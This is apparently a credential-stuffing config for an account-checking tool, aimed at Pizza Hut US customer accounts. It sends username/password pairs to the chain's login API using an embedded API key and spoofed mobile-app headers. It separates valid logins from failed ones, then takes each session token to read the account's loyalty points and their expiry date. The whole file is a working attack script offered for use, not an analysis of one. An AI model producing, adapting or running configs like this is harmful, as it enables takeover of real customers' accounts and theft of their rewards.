[SETTINGS]
{
  "Name": "Pizzahut US",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-06-27T14:45:23.336378+02:00",
  "AdditionalInfo": "",
  "Author": "Desme#5333",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
BEGIN SCRIPT JavaScript
function uuidv4() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}
var UUID = uuidv4()
END SCRIPT -> VARS "UUID"

#LOGIN REQUEST POST "https://services.digital.pizzahut.com/phdapi/v1/customer/login?key=x61c4lN6nyNJZMpwyo228jCAGGCri7n0" 
  CONTENT "{\"channel_id\":\"pizzahut\",\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: services.digital.pizzahut.com" 
  HEADER "Accept: */*" 
  HEADER "auth-channel: pizzahut" 
  HEADER "conversationid: <UUID>" 
  HEADER "api-session-id: 7f572fbb-db34-484b-908b-6bd29ad011f4" 
  HEADER "Accept-Language: de-de" 
  HEADER "Accept-Encoding: br, gzip, deflate" 
  HEADER "User-Agent: pizzahut/2455 CFNetwork/974.2.1 Darwin/18.0.0" 
  HEADER "Connection: keep-alive" 
  HEADER "X-NewRelic-ID: VQcFWV9XARABV1lWBQAFVlw=" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The email/password you entered is incorrect" 
    KEY "The email / password you entered is incorrect" 
  KEYCHAIN Success AND 
    KEY "auth_token" 
    KEY "first_name" 

#TOK PARSE "<SOURCE>" JSON "auth_token" -> VAR "TOK" 

#GET_POINTS REQUEST GET "https://services.digital.pizzahut.com/phdapi/v1/customer/loyalty?key=x61c4lN6nyNJZMpwyo228jCAGGCri7n0 " 
  
  HEADER "Host: services.digital.pizzahut.com" 
  HEADER "Accept: */*" 
  HEADER "auth-token: <TOK>" 
  HEADER "auth-channel: pizzahut" 
  HEADER "conversationid: <UUID>" 
  HEADER "api-session-id: 7f572fbb-db34-484b-908b-6bd29ad011f4" 
  HEADER "temp-auth-token: <TOK>" 
  HEADER "Accept-Language: de-de" 
  HEADER "Accept-Encoding: br, gzip, deflate" 
  HEADER "User-Agent: pizzahut/2455 CFNetwork/974.2.1 Darwin/18.0.0" 
  HEADER "Connection: keep-alive" 
  HEADER "X-NewRelic-ID: VQcFWV9XARABV1lWBQAFVlw=" 

#POINT PARSE "<SOURCE>" JSON "availablePoints" -> CAP "Points" 

#EXPIRES PARSE "<SOURCE>" JSON "expiration_date" -> CAP "Expires" 

#FILTER KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "Your points have expired" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "account_not_found" 

